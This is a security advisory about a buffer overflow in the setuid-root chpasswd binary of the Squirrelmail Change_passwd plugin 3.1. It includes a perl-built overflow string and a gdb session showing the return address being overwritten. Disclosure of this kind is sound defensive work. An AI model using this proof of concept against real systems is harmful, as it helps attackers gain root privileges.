‘Squirrelmail Change_passwd Buffer Overflow’
‘Change Passwd plugin, is ‘a Squirrelmail plugin to allow your users to change his/her system password in /etc/passwd or /etc/shadow, the plugin uses a C program to make possible the alteration of the password’.
A buffer overflow vulnerability in the plugin allows local attackers that are able to call the plugin directly (usually only root and apache/nobody/etc are) to cause it to overflow an internal buffer and execute arbitrary code and gain elevated privileges (as the file is setuid root).’
‘The information has been provided by Matias Neiff.’
* Squirrelmail’s Change_passwd version 3.1
The vulnerable code is inside main() function that neglects to verify whether the size of the buffer of the user provided data is not too large to the destination (when it calls the sprintf functions).
Proof of Concept:
# export RET=`perl -e ‘print ‘BCDE’.(‘A’x136).’0123”`
# gdb ./chpasswd
GNU gdb 6.0-debian
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type ‘show copying’ to see the conditions.
There is absolutely no warranty for GDB. Type ‘show warranty’ for details.
This GDB was configured as ‘i386-linux’…
(gdb) r $RET a a
Starting program: /home/noam/change_passwd/chpasswd $RET a a
The user BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0123 don’t exist!
Program received signal SIGSEGV, Segmentation fault.
0x33323130 in ?? ()